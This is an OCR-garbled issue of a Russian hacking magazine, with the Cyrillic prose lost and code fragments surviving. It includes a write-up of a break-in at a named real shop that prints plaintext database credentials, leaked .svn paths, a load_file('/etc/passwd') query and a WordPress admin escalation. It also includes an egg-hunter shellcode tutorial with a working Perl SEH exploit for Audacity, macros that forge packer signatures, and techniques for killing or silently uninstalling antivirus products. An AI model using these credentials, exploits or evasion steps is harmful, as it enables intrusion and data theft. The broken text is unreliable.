c = (c shr 1) xor (0xedb88320 * (c and 1))
end repeat
CRC32_SUM = c xor 0xffffffff
}

;mov eax,[fs:0x30],
test eax,eax
js @f+1
call .end.sign
pop eax
add eax,7
db 0xC6
nop
ret
@@:
db 0xE9,0x00,0x00,0x00,0x00
.end.sign:
else if variant = 1
;CD-Cops II -> Link Data Security
push ebx
pushad
mov ebp,0x90909090
lea eax,[ebp-0x70]
lea ebx,[ebp-0x70]
call $+5
lea eax,[ecx]
db 0xE9,0x00,0x00,0x00,0x00
...
else if variant = N
...
, if(original_hash != current_
hash) Error() ! , . :
mov eax,address + original_hash
sub eax,current_hash
call eax
. : , , ,
- , .
0XACCEDE,
PEiD , ,
\. ,
, , Entry
Point . ,

, , . , , , .
macro facke_sign {
randomize
variant = rndnum mod N
if vatiant = 0
;PE Protect 0.9 -> Christoph Gabler
push edx
push ecx
push ebp
push edi
db 0x64, 0x67, 0xA1, 0x30, 0x00
;FASM
X 08 /139/ 10
0XAD105.

. : ,
, . ,
, ,
.
:
FASM, trial- ;
,
. (,
crack' ..)
. , , ,
, . , ,
, . , open your
eyes, open your mind! z
061

icq 884888, http://snipper.ru
!
-
! .
growshop azarius.net
.
About Azarius, ,
-
( 1999 ) .
,
:).

, , , ,
, mod_
rewrite, http://azarius.net/smartshop/
psychedelics/. ,
, WordPress (http://azarius.net/
blog/), phpBB 2.0.22 (http://azarius.net/forum/
docs/CHANGELOG.html) - Piwik 0.5.5
(http://piwik.azarius.net).
Piwik
XSS ( advisory ). XSS , ,

.
.
,
, .svn-
. .
-, SVN ,

.
062
-, SVN
, .svn.
entries
, , .svn.
, , ,
.
, :
SVN, ,
site.com/.svn/entries,
.
azarius.net/.svn/entries,

2008-11-18T10:25:57.000000Z
c581920ba2dad34f3e6841ac061d958c
2007-11-16T11:06:53.860515Z
935
alex
category.php
file
2008-11-18T10:25:57.000000Z
7ce2e23ac9bc560edc2e79073fb630db
X 08 /139/ 10
HTTP://WWW

links
2007-01-04T16:03:07.477725Z
138
alex
find.php
file
2009-05-01T12:58:14.000000Z
beea2f728667240c14795d3c508a5144
2009-05-01T09:08:40.782967Z
1307
alex
recent.php
file
, PHP-
.svn/text-base/, .
,
azarius.net
,
, - .
- ,
, .
,
:).

phpBB azarius.net/forum/.svn/
text-base/common.php.svn-base:
<?php
$dbms = 'mysql4';
$dbhost =
$dbname =
$dbuser =
$dbpasswd
'database.azarius.net';
'azaforum';
'web_azarius';
= 'azariuskaki734';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
, -
database.azarius.net
.
80 HTTP- :
[an error occurred while processing this
directive]
You don't have permission to access the
requested directory.
X 08 /139/ 10
There is either no index document or the

directory is read-protected.
[an error occurred while processing this
directive]
Phpmyadmin' , 3306
.
( :) MySQL RST/
GHC Manager,
phpBB.
, ( ,
-
!).
, .
, :
information_schema, Affiliate, aff, azabase
azaforum, cms_system, cmsbase, enquete,
payments, syslog, syslogaza, test, wordpress
payments log,
,
azabase.
: 239545 , 291187 .
:
UserID, UserStatusID, FirstName,
LastName, Email, EmailVerified, Company,
CompanyDescription, KVKNumber,
BTWNumber, InvoiceAllowed, Remark,
Password, ForumID, ForumAdmin,
LastLogin, LangID, CurrencyID,
_Buyer_Address, _Buyer_Host, _Buyer_Agent,
_Klantcode, _Tussenvoegsel, _Korting,
_PasswordNew, _EmailSend, _session_id,
_Website, modified, Newsletter, Nickname

, ,
-
:).
piwik.org/
blog/2010/04/piwik-06-security-advisory/
Piwik <= 0.5.5
Login Form XSS
habrahabr.ru/blogs/
infosecurity/70330/
.svn
https://forum.
antichat.ru/threadnav51383-1-10.html
MySQL RST/GHC
Manager 2.3
snipper.ru/view/5/
magic-include-shell/
Magic Include Shell
3.3.3
INFO
info

MySQL
.

mysql.user,

Host (

%,
localhost).
WARNING
info

.

.
,

,

.
063
azarius.net
cat ./*|grep
ServerName:
SELECT load_file('/etc/passwd')
, SVN
.
, , , ,
,
WordPress :).
, http://www.azarius.net/blog/wp-login.
php?action=register , wordpress.
,
wp_usermeta wp_capabilities.
, , , :
a:1:{s:10:"subscriber";b:1;}
, ,
:
a:1:{s:13:"administrator";b:1;}
, http://azarius.net/
blog/wp-admin .
,
Hello dolly .
http://azarius.net/
blog/?azarius :).
:
1. ;
2. ;
3. -.
, PHP-
/var/www/html/azarius/public/, , ,
.
, ,
.
locate httpd.conf /
etc/apache2/sharedconfig/sites-enabled/,
.
064
affiliate.herbaldistribution.com
blog.azarius.net
conscious.nl
consciousdreams.nl
database.azarius.net
dropshipping.consciouswholesale.com
middleware.entheogenics.com
pimpyourbicycle.com
piwik.azarius.net
redir.vaposhop.com
secure.azarius.net
stats.azarius.net
webman.azarius.net
webman.vaposhop.com
www.azarius.at
www.azarius.be
www.azarius.es
www.azarius.fr
www.azarius.net
www.azarius.nl
redir.azarius.nl
www.azarius.pt
consciouswholesale.com
www.crazy-t-shirts.com
www.cultofarcha.com
www.entheogenics.com
greenlabelseeds.com
www.mushxl.nl
www.shavita.net
www.shroomshaker.net
smartshop.nl
www.travellersgarden.com
vaposhop.com
www.xtenzion.nl
, azarius.net ,
:). , ,
.
,
,
, , (,
, :).
-
,
.

, , , . , , ! z
X 08 /139/ 10
egg hunt
][

Windows.
, - .
: /.
Egg Hunting.
EGG HUNTING?

, . , .
, Egg Hunting ,
/. .

skape 2003 (hick.org/code/skape/papers/egghuntshellcode.pdf).
, ,
/ ,
. , .
, ...
, ,
PoC-.
, , TCP-.
,
, -
066
, , .
, , ,
, ,
,
, , , .
, staged-,
, . - ,
staged-. ,
200 (
27 :)), 341 .
\x00\xff, ,
227 368 .
, -: 534, 816.
, .
c . ,
DNS, Easy Hack,
1000 , .
?
? -. .

, ,
EIP. , MSF X 08 /139/ 10

SEH

Payload information. , ms08_067_netapi 400 ,
trendmicro_serverprotect 800 , ActiveX , . ,
, . ?
, .
- . ?
. , IE 6/7, -,
, imap- Mercur
Messaging imap-.
, ... ,
Windows ASLR, SafeSEH,
DEP, GS .. ? ,
, , . , , . ,
:).
jit-spay IE8, FF3.6 DEP, ASLR
(exploit-db.com/exploits/13649/), .
jit-
, .
- .
- ?
-, - ,
.
,
. tag egg, egg hunting.
,
. , ,
. ,
, , :).
,
().
,
access violation, .
-, ,
. ( )
Windows. :
, ,
.
.
X 08 /139/ 10
NTDISPLAYSTRING / NTACCESSCHECKANDAUDITALARM
( :)) . (system call) NtDisplayString

. :
NTSYSAPI NTSTATUS NTAPI NtDisplayString(
IN PUNICODE_STRING String
);
, : EAX ,
, .
, , EDX. EAX
0xc0000005, Access Violation. scads,
(egg) EAX EDI.
:
00000000
00000005
00000006
00000007
00000009
0000000A
0000000C
0000000E
0000000F
00000011
00000016
00000018
00000019
0000001B
0000001C
0000001E
6681CAFF0F
42
52
6A43
58
CD2E
3C05
5A
74EF
B890509050
8BFA
AF
75EA
AF
75E7
FFE7
or dx,0xfff
inc edx
push edx
push byte +0x43
pop eax
int 0x2e
cmp al,0x5
pop edx
jz 0x0
mov eax,0x77303074
mov edi,edx
scasd
jnz 0x5
scasd
jnz 0x5
jmp edi
, EDX
. 1000h x86,
, , , .
, EBX FFF,
, 1000h.
, , EDX 1h(.
00000019, 0000001C), ,
1000h (. 0000000F).
EDX , , .
EAX 0x43h. , NtDisplayString. int 2e
. , ,
EAX. 0x5
067

( , access violation)
. , ,
EDX .
. 0x77303074 (
, w00t), . EAX, EDI
EDX. SCASD EAX c ,
EDI.
, EDX ,
.
SCASD ,
. SCASD
EDI , , jmp edi.
-
? , skape
NtDisplayString
NtAccessCheckAndAuditAlarm.
.
NtDisplayString:
00000007 6A43
push byte +0x43
NtAccessCheckAndAuditAlarm:
00000007 6A02
push byte +0x2
NtAccessCheckAndAuditAlarm . (0x43h),
NtDisplayString
.
ISBADREADPTR
API- .
:
BOOL IsBadReadPtr(
const VOID* lp,
UINT_PTR ucb
);
,
.
,
.
068
Egghunter
00000000
00000002
00000007
00000008
0000000A
0000000B
00000010
00000012
00000014
00000016
0000001B
0000001D
0000001E
00000020
00000021
00000023
33DB
6681CBFF0F
43
6A08
53
B80D5BE777
FFD0
85C0
75EC
B890509050
8BFB
AF
75E7
AF
75E4
FFE7
xor ebx,ebx
or bx,0xfff
inc ebx
push byte +0x8
push ebx
mov eax,0x77e75b0d
call eax
test eax,eax
jnz 0x2
mov eax, 0x77303074
mov edi,ebx
scasd
jnz 0x7
scasd
jnz 0x7
jmp edi
EBX
. , 0x8h ucb-, EBX
. EAX IsBadReadPtr . ,
, -, ,
. EAX ,
. .
SEH,
,
(60 ), , , XP SP2 SEH',
.
() ,
( )
, , , .
SCASD, ,
(D) , ,
.
CDL.
X 08 /139/ 10
:
access violation 41414141.
: EIP , . ESI, ECX.
(. ). SEH (View - SEH
chain).
, . . , ,
pvefindaddr.
:
!pvefindaddr pattern_create 2000

,
. ,
,
, 100%
.
, Linux- ,
Windows, , , .
skape.
. .
,
.
, , , .
Audacity.
1.2.6. offensive-security.com/
archive/audacity-win-1.2.6.exe, .
, ,
.
Immunity
Debugger c pvefindaddr corelanc0d3r' (
). immunityinc.com/productsimmdbg.shtml, corelan.be:8800/index.php/security/
pvefindaddr-py-immunity-debugger-pycommand/ .
, pvefindaddr , .
PyCommands.
Perl, Win
ActivePerl activestate.com/activeperl.
, . MIDI- . AAAAA
2000 .
#!/usr/bin/perl
$junk = "\x41" x 2000 ;
# 2
$sploit = $junk;
#
open(FILE, ">test.gro") or die "Cannot open file: $!";
#
print FILE $sploit;
#
close(FILE); #
print "test.gro has been created \n";
Audacity (F9).
(- MIDI).
X 08 /139/ 10
, (l)
mspattern.txt Immunity Debugger,
$junk. test.gro
(ctrl+F2).
, suggest,
8 , ,
(, SEH ..),
.
!pvefindaddr suggest
.
, SEH
67413966, :
!pvefindaddr pattern_offset 67413966
SEH, . SEH-
4- .
(nextSEH),
, ,
. . , , -
pop, pop, ret,
, ,
. nextSEH
, , , \xeb\x06\x90\
x90. 6 (2 \x90
(NOP) 4 SEH), ,
.
, ,
:).
, SEH 178 , next SEH 174. .
, pop pop
ret, .
. . p safeSEH, p1
safeSEH ASLR, 2 . .
!pvefindaddr p
, , ,
, . -.
069
pvefindaddr
$junk = "\x41"x174; #
$jumpNextSEH = "\xeb\x06\x90\x90"; # 6
$SEH = pack ("V",0x013e5423); # pop

pop ret
$shell = "\x42"x200"; # ,
B 200
$sploit = $junk.$jumpNextSEH.$SEH.$shell;
, . SEH-:
1. View SEH chain;
2. Follow hadler.
pop, pop, ret. , pop'

F2 ( SEH chain). Shift+F9, .
pop. (F7) ret NextSEH, 6 .
B.
, ,
200 . 72 . .
, . , ,
... .
-
.
,
:
#!/usr/bin/perl
$shell="\xeb\x03..\x5a"; # -
open(FILE, ">shell") or die "Cannot open file: $!";
print FILE $shell;
close(FILE);
!pvefindaddr compare c:\egg\shell
, , -.
, .
.
, 73 , .
,
, - . - 72 ,
, . :
070
, SEH-
#
$tag="\x77\x30\x30\x74";
# NtAccessCheck
$egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\
x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" . $tag . "\x8B\
xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
#
$junk2="\x90"x50;
#
$sploit = $junk.$jumpNextSEH.$SEH.$egghunter.$junk2.
$tag.$tag.$shell;
$junk2 , 73
, ,
() , . -, .
SEH, .
,
,
. , EDX(\x33\xD2)
. ,
.
. :
corelanc0d3r': corelan.be:8800/index.php/2010/01/09/exploitwriting-tutorial-part-8-win32-egg-hunting/.
MSF: offensive-security.com/metasploitunleashed/ - : r00tin.
blogspot.com/2009/03/heap-only-egg-hunter.html
. . , .
, , ,
. , , ,
,
. , Mercur Messaging 2005 IMAP-.

SUBSCRIBE(CVE-ID: 2007-1579). 224 payload. ,
LIST , 2 . McAfee
ePolicy Orchestrator 3.5.0. 140 , .
- , , .
:). z
X 08 /139/ 10
!

1.
8.5
DVD
!
3 !
? ?
.
.
( )

.
540 .

72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)2003-999 ( ,
, ).
,
info@glc.ru
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,

:
2200 . 12 , 1260 . 6
. ,

, R-kiosk
. .27-31:
540.00 . 6 !
, , , .

icq 884888
X-TOOLS

: ATC File Wiper
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: AlexTheC0d3r
E:\ATCfilewiper.exe "e:\downloads\
papka_dlya_ydaleniya"
(
);

;

.
extraClean:
D:\vasya\*.exe
C:\documents and settings\Admin\My
Documents\*.*
C:\MyProgs\*.pas
C:\nokia\jimm.*
,
- .
,
.

, .

.
, ATC File Wiper
AlexTheC0d3r'
: GUI .
:
(
);
,
, <;
(
);
Windows;
GUI
:
e:\Program Files\ATC\wipergui.exe
"D:\papka_dlya_ydaleniya" 15);
072

, .
,
, (
).
, ,

https://forum.antichat.ru/
showpost.php?p=1898379.
: WebDirScanner
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0x00
;

-;

oks.txt log.txt (^ ": ");

;
.Net Framework 2.0 .

,
:
dmin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php

webxakep.net/
forum/showthread.php?t=5201.

- .
WebDirScanner
webxakep.net, 0x00.
,

.
:

dir.txt;
: ArxGrabberSite
Vista/2008 Server/7
: ArxWolf
,

ArxGrabberSite.
,
.
X 08 /139/ 10

,
, PHP:
Email: [_a-zA-Z\d\-\.]+@[_a-zAZ\d\-]+(\.[_a-zA-Z\d\-]+)+
URL: (?i)href=("|#39|)(http://|h
ttps://|ftp://|www.|UPD://)([_az\d\-]+(\.[_a-z\d\-]+)+)((/[ _az\d\-\\\.?=&%://]+)+)*
JS: <script([^>]*?)>(.*?)</script>
:
email-;
;
JavaScript;
;
;
;
.

ArxWolf' webxakep.net/forum/
showthread.php?t=4850.
: SGalaxy v 0.7
Vista/2008 Server/7
: RINGER

(javagala.ru).

:
;
;
;
;
;
;
;
email.

,

.

:
0
;
1-5
1-5 ;
X 08 /139/ 10
911 ;
922 ;
999 ;
933 ;
111 ;
1000 ;
222 email;
40
;
50 .
, :)
: VK VoTeR
Vista/2008 Server/7
: mailbrush

VK VoTeR

mailbrush.
,
,

.
.
:
1. ;
2. ;
3.
(, :)

":"

.

, ,
.
.
:
;
[OPTION]
;
, .
, #8 ,
,

:
[OPTION] the best!|

[OPTION]|[OPTION] !
,
"|",
:
the best!

!
, . ,
https://forum.antichat.
ru/thread194387.html.
: slil.ru File Uploader

:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: slesh

,
slil.ru.
:
1. ;
2. :
2000, XP, 2003 C:\Documents and
Settings\< >\SendTo\
Vista, 7 C:\Users\< >\AppData\Roaming\Microsoft\
Windows\SendTo\
,
.
slil.ru.
:
;
;
;
(WinAPI + WinSock);
7680 .

. z
073
MALWARE
RankoR ax-soft.ru
l
a
t
o
T
s
iru
V

, VirusTotal',
.
? ,
,
.

, ? .
. VDS,
Dedicated. Core
Duo, 2 RAM (10
/) $100 .
:).
074
Linux
,
( )
.
Ubuntu Server 10.04.
C++/Qt.
,
, Qt ,
.
PHP + AJAX. ?
/, ,
.
.
X 08 /139/ 10
PHP-
const QString &av,

QString &output,
const int exitCode);
private slots:
void onFinished(int exitCode,
QProcess::ExitStatus exitStatus);
void onReadyRead();

.
? ,
stdout.
, --help, , (, )
.
?
(
][ ), Qt QProcess,
.
, . , . ?

. :
class QAvProcess : public QProcess {
void inline startProcess(
const QString &name,
const QStringList &params);
......
signals:
void onAvFinished(QAvProcess *sender,
};
, QProcess.
:
void QAvProcess::startProcess(
const QString &name,
const QStringList &params)
{
QFileInfo info(name);
avName = info.fileName();
start(name, params);
}
, . ,
onReadyRead, , onFinished()
emit onAvFinished(this, avName,
avBuffer, exitCode). , , :
WARNING
warning

INFO
info
RESPECT
-3-1
(
)
.
DieHard, YaesU, metal
Asechka.Ru community
class QAv : public QObject{

void startCheck(const QString &fName);
private:
QMap<QString, QString > avs;
QList<QResultPair > results;
QString fileName;
inline QAvProcess* createProcess();
QVirInfo inline parseOutput(
const QString &avName,
const QString &output);
signals:
void onAVDone(const QString avName,
const QString avResult);
private slots:
void onAvFinished(QAvProcess *sender,
const QString &av,
const QString &output,
const int exitCode);
};
. X 08 /139/ 10
075
MALWARE
onAvFinished()
QString avName = avs.find(av).value();
if ( avName.isEmpty() ){
qDebug() << "[-] Unknown process finished";
return;
}
avsRemains--;
QVirInfo info = parseOutput(av, output);
if ( ! info.isInfo ) {
writeResult(avName, "ERROR");
return;
}
if ( ! info.isInfected )
writeResult(avName, "OK");
else {
writeResult(avName, info.description);
avsFound++;
}
delete sender;
if ( ! avsRemains ) {
qDebug() << endl << endl << "Done,"
<< avsFound << "/" << totalAVs << "found!";
qDebug() << endl << "RankoR, Ax-Soft.Ru,
Russia, 2010";
writeFooter();
QCoreApplication::exit();
}
startCheck():
void QAv::startCheck(const QString &fName)
{
qDebug() << "[*] Scanning file";
fileName = fName;
QStringList params;
QAvProcess *process;
// BitDefender
process = createProcess();
params << "--action=ignore"
<< fileName;
process->startProcess("bdscan",
params);
params.clear();
}
fName, , , .

.
, , (const QString &fName)? ,
( , , QString fName)
, ,
(QString fName) . , .
const QString &fName
. (
sizeof(void*)), , .
, ,
. ? ,
,
. , . ,
076
,
( ).
, , .
, qDebug(). ?
Qt ( ,
).

createProcess(). :
QAvProcess *process = new QAvProcess;
connect(process, SIGNAL(onAvFinished
(QAvProcess*,QString, QString,int)),
this, SLOT(onAvFinished(QAvProcess*,
QString,QString,int)));
return process;
,
onAvFinished() (. )
: avs QMap
typedef QPair<QString, QString > QResultPair;
;
.
parseOutput().
,
. :
QVirInfo info;
info.isInfo = info.isInfected = false;
if ( avName == "bdscan" ) { // BitDefender
if ( output.indexOf("ok") > 0 ) {
info.isInfo = true;
return info;
}
int index = output.indexOf("infected:");
if ( index == -1 )
return info;
info.description = output.mid (index + 9,
output.indexOf("\n", index) index - 9).trimmed();
info.isInfo = info.isInfected = true;
}
.
- , . , ( , )
. .
onAvFinished().
HTML- .
! . : ? , :
1. .
. 1 1 . ?
Iptables !
2.. /
/ .
3. .
, . PHP! C++ PHP + Ajax ,

Ajax- Sajax, SQL- SQLite .

. . , :)..z
X 08 /139/ 10
MALWARE
deeonis deeonis@gmail.com
INSIDE
AV-:
!
?
, ,
... ,
. -.
,
.
. Kaspersky CRYSTAL.
. ,

,
, ,
,
078
. Dr.Web Security
Space Pro. .
, .

-
.
,
Kaspersky

.

. ,

X 08 /139/ 10
. !
. , .
- .
. ,
API-.
,
, ,
. , ,
,
, API-
.
,
Windows
. ,
. ,

, .
, ,
, -.
Windows. , Windows XP Professional SP3.

.
, , ,

. ,
.
.
, -,
.

.

,
.
, .
- . ,
. ,
. MoveFileEx,
.
, , ,
. ,
NULL
,
MOVEFILE_DELAY_UNTIL_REBOOT,
.
. , .
. ,
. Kaspersky
CRYSTAL. ,
, avp.exe.
,
X 08 /139/ 10
WARNING
warning

INFO
info
RESPECT
-3-1
(
)
.
DieHard, YaesU, metal
Asechka.Ru community
079
MALWARE

MOVEFILE_DELAY_UNTIL_REBOOT MoveFileEx
,
.
(
),
.
: . ,
. .
,
. ,
, :
DWORD pseudoRandomDigit(const DWORD digit)
{
fopen("dsjklfjsdlk", "r");
DWORD err = ::GetLastError();
return digit + err;
}
pseudoRandomDigit .
,
.
,
, - . , , ,
- .
. ,
%programfiles%\Kaspersky Lab\Kaspersky CRYSTAL\.
,
,
.
, ,
. -
, .
.
avp.exe -
.
, Kaspersky CRYSTAL , , , .
, .
Dr.Web Security Space Pro.
CRYSTAL, exe-, .
, , , dwengine.exe.
, . , .
! ,
- , ,
.

,
. , .
:).
080
2
- , . .
,
. .
,
.
Kaspersky CRYSTAL. avp.exe, .
. ,
. , ,
Kaspersky . :
.
Dr.Web .
- , ,
. license.txt! .
3

, . , , , MoveFileEx
MOVEFILE_DELAY_UNTIL_REBOOT.
,
(. ).
Kaspersky CRYSTAL
. , , . ,
? , ... .
. , avp.exe . .
CRYSTAL
. : , . Dr.Web?
, , ? , .
, .
. - ,

.
. ,
. .
4

Windows XP Professional.
... : gpedit.
msc. .
User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
.
avp.exe.
Windows,
. Kaspersky CRYSTAL
, .
, . , . !
Dr.Web . dwengine.
exe ,
, .
SpIDer Guard.
- .
, .
X 08 /139/ 10

.
:)
,
, , , , ,
. .
5
. ,
.
,
.
.
Kaspersky CRYSTAL
: msiexec /quiet /
uninstall {1A59064A-12A9-469F-99F6-04BF118DBCFF}.
/quiet ,
, . .
,
, .

.
.
Dr.Web , , .
msiexec

.
1
2
3
4
5

X 08 /139/ 10
. .
. ,
, ,
,
. ,
, . Dr.Web
, .
. .
, . Kaspersky
CRYSTAL, Dr.Web Security Space Pro
.
,
.z
KASPERSKY CRYSTAL VS DR.WEB

SECURITY SPACE PRO
:
. Windows.
.
. MoveFileEx MOVEFILE_DELAY_UNTIL_REBOOT.
-: Kaspersky CRYSTAL 3.6 , Dr.Web Security
Space Pro 4.4 .
KASPERSKY CRYSTAL
3
3
2
5
5
3.6
DR.WEB SECURITY SPACE PRO

5
5
5
4
3
4.4
081

Mifrill mifrill@real.xakep.ru
IT-

,
. ,
,

.
, ,
,
,
- , , ,
, , .
,
? ? .
,
,
,
IT-,

. ,
, , ,
. , ,
,
.
, ,
how to, ,
.
,
,
,
IT- . ,
,
082
074

Discovery :).
,
:
? , ,
, ,
, . ,
,
, ,
. , ,
, .
, , , ,
( hh.ru

).
,
, ,
, .
:
, ; ,

.

, ,
,
, .
, , ,
.
, , ,

, (http://forum.awd.
ru/),
.
, ,
, ,
, . ? . ,
:

. , ,
, .
, ,

. , :).
.
, , .
,
, ,

.
: , ,

IT-.
, ,
, ,
. ,

. , ,
,
X 08 /139/ 10
?
, :
?. :
, .
IT-.

, , . , , .
.
/.
IT-.
, , . , -
, - ,
, (
, ).
:
?!.
, , , IT-
.
X 08 /139/ 10
; ,

,
, , ,
. ,
, -
, .
,
,
,
,
.

.
,
. ,
HardnSoft ,
,
:

( , ,
). ,
, -.

HardnSoft.
,
.

:).
, 28 2009
( ) .
. 40
083
,
.
: , , , ,
. , (
).
20
, $185,
.
$300$500, ,
. $30
.
. $200
, .
,
.

, , ,
.
,
$350.
. ,
.
,
, -
:).
, ,
.
.
, , .
-
084
$70-$100 .
.
, .
.
, ,
$500-$700 .
,
, .
, , 53 ,
. ,

.
IT- ,

( ,
).
-
(
), -,
, ;
60% .

, , , -, , ,
. ,
,
, - , ,
, - IT,
.
,
,
, ,
,
,
. , ,
, ,
- SEO-
:).

,
,
, ,
, .
IT-
, ,
,
,
, .
, ,
45 ,
.
, , , ,

( ).
IT- ,
, .
, IT-, ,
, .
, ,

,

, , ,
.
45
X 08 /139/ 10
, , ,
.

.
, 3-5
IT-,
- . ,
, ,
, . ,
,
( ), ,
.
, ,
,
, ,
.
,
Tier 1,

),

.
, .
-
. , -
800-1000 ,
500 .

.
,
,
- .
, ,
,
(
). ,

.
,
,
, ,
,

. , Tier
1
IELTS
, (Masters
Degree),
.
UK
90 . ,
( NARIC ),
90 , ,
,
.
(
,
500-700 (24-33 . ) ,
100
), , ,
.

, (
,
).

20%,
,
IT, , - .
,
, (
,
X 08 /139/ 10

, , , EU.
, , ,

. .

,
.
,
. ,
, , :
800-1000 ;

300 . ,
.

,

, .
,
,
:

, - .
IT-, ,
.

,

.
(
), ,
.
, , , , ,
IT-
- :).

- 5000 .

, , , ,
.
, , : ,
,

- .
McAfee
senior reverse engineer.
, ,
.
Mifrill (M): ? , ?
(..): .
,
,
- - .
, ,
.
,
,
.
.: , ,
, ,
. ?
..:
,
. , sensepost.com. ,
, ,
. .
.: , ?
,
,
,
?
..: , , ,
, . ,
, , .
085
, ,

(, , , ).
- ,
,
,
. , -
. ,
.
,
$800
. Endeavor Security.
, ,
?
, ,
, .
. - ,
, 2008 .
, ,
, McAfee
. 2009 ,
.
.:
.
, , , ?
.: , ,
, ,
, , ?
..: , ,
, ,
.
. ,
,
.
, ,

, . , ,
6 -
..:
,
.
12 , 4,
.
, , ,
. ,

, ,
. ,
..:
( -
) . ,
, ,
, ,
.
,
. ,
Apple, .
, -. , ,

, McAfee,
, iDefence.
,
, .
.: , .
( ,
)?
,
, ,
.
Macrovision,
: , ,
.
, .
: :).

,
, ?
..: ,
. ?
? , ,
. ,
-,
.
, ...
, .
,
$5 ,
. -
086

- ,
- .
, ,
,
. , .
, .
,
. ,

.
.: , McAfee.
, ?
..: 2009 Endeavor Security, , McAfee,
,
. ,
,
... , -
, ,
- ( 10 . 5 , ),
.
, ,
.
, ,
, ,
, .
,
.
. , 10 000
. , [censored].
.: -
?
X 08 /139/ 10

.
, ,

.
, .
.: , ,
. , , , , ,
, ? ,
.

..: , . ,
Google Aurora.
. ,
, , -,
. , ,
... ,
, .
.
.: ?
..: ,
. ,
. ,
, , , ...
,
, , . (Asus eee, , )

:).
.: ,
,
?
..: , , McAfee
. , .
.: , ?..

.
,
:). , .

,
.
.: , ,
, ,
.
?
..: , ,
, :).
5-
, , 1/4
. .
X 08 /139/ 10
..: , .
( ),
, , , , .
, , ,

i94, ,

. ,
,
. , , ,
.
, i94 .
6 ,
, .
..: ?
, ,
(
!). $2000
,
,
.
, , .
, .
, ID,
.
.
... -,
,
$500
, $10 000
. , . , ,
:)

: 100
,
, , , . ... , ,
256 $20 ,
.
,
- ,
.
15 ,
.
: ,
, .
- , .
.
,
, .
. ?
,
, .
P.S.
O-1A,
,
! z
087
UNIXOID
bober zloy.bobr@gmail.com

Linux
Unix, ,
(ugo),
.
, , -
,
. - .
,
- .
088
, ,
, .
Unix , -
.
(Discretionary Access Control DAC),

.
,

, .
DAC
X 08 /139/ 10
SELinux
, , , ,

.
.
, DAC :
;
. Linux
,
MAC (Mandatory Access Control, ).
,
,
. MAC , DAC, Unix, ,
,
.
, Unix
. ,
.
:

. ,
, -
,
. ,
, .
,

. Linux :
SELinux RedHat , AppArmor Ubuntu.
2.6.30
TOMOYO Linux (tomoyo.sf.jp),
, .
, .
SELINUX
SELinux (Security Enhanced Linux, selinuxproject.
org) U.S. NSA (National Security Agency),

Linux ,
-, . 2000 ,
: -
, ?
X 08 /139/ 10
SELinux Administration
GNU
GPL 2.6., FreeBSD OpenSolaris.
MAC ,
.
SELinux - Role-Based Access Control (RBAC),
. SELinux Type Enforcement
(TE) ,
, .
, , , ,
, , ,
(
). SELinux (MLS, Multi-Level Security model),
, ,
,
.
, SELinux
,
. ,
. (, , , .)
, .
, SELinux ,
.
,
- .
,
Extended attributes
.
.
, .
, .
SELinux ( semanage),
UID Linux
(uid), .
SELinux ,
Linux
SELinux.
HTTP://WWW
links
SELinux selinuxproject.
org

TOMOYO Linux
tomoyo.sf.jp
INFO
info

,

.
.
DVD
dvd

089
UNIXOID
LIDS, GRSecurity RSBAC

, , , Linux-
LIDS (Linux Intrusion Detection System, lids.org), GRSecurity
(grsecurity.org) RSBAC (Rule Set Based Access Control, www.rsbac.
org). .
LIDS MAC, . TPE (Trusted
Path Execution) TDE (Trusted Domain Enforcement)
, , .
, .
- .
# lidsconf -A -o /sbin -j READONLY
GRSecurity , MAC/ACL, chroot,

TCP ISN PID,
RBAC, ,
PaX ( ).
, gradm ACL.
RSBAC,
, 2000 . , ,
.
(GFAC,
Generalized Framework for Access Control). root ,
.
: Linux
DAC, , JAIL, PaX,
Dazuko, Linux .
, .
AppArmor
# ps aux | grep syslogd
root 2729 0.0 0.0 5908 624 ? Ss 07:30 0:00 syslogd -m 0
# cat /proc/2729/attr/current
system_u:system_r:syslogd_t:s0
SELinux disable (),

enforcing ( , , ), permissive ( ,
avc: denied, ).
, , , ,
/selinux:
$ cat /selinux/enforce
1, , SELinux .
, 0 1:
# echo 0 > /selinux/enforce
su SELinux. root .
:
$ id Z
user_u:user_t:unconfined_t
:
$ su
# id Z
user_u:user_t:unconfined_t
, :
# id -Z
root:system_r:unconfined_t:SystemLow-SystemHigh
setenforce [ Enforcing |
Permissive | 1 | 0 ].
, /etc. , RedHat,
SELinux Administration Tool (system-configselinux, policycoreutils-gui). ,
/etc/sysconfig/selinux ( /etc/selinux/
config). , SELINUX:
SELINUX=enforcing|permissive|disabled
SELinux
, : dhcpd, httpd, named, nscd, ntpd,
portmap, snmpd, squid syslogd. unconfined_t. ,
SELINUXTYPE strict:
SELINUXTYPE=targeted|strict
newrole. SELinux .
, :
# ls -l context /
# ps -ax -Z
, /proc:
090
/etc/selinux/targeted/contexts .
, root :
# cat /etc/selinux/targeted/contexts/users/root
system_r:unconfined_t:s0 system_r:unconfined_t:s0
system_r:initrc_t:s0 system_r:unconfined_t:s0
X 08 /139/ 10
SELinux : setools policycoreutils, policycoreutils-newrole. ,

, , . , newrole,
,
policycoreutils.
targened,
selinux-policy*.
selinux-policy-devel.
200 , ,
.
audit2allow ( policycoreutils),
SELinux.
APPARMOR
AppArmor
Skype
,
Skype. (. Skype: , www.xakep.ru/post/38543/default.
asp). .
, ,
, . , , : www.cynapses.org/tmp/apparmor/
usr.bin.skype.
apparmor-profiles.
.
aa-genprof ( genprof). :
$ sudo aa-genprof /usr/bin/skype
: , , , .
/etc/apparmor.d/usr.bin.skype.
AppArmor enforce-:
$ sudo aa-enforce skype
AppArmor .
, httpd,
:
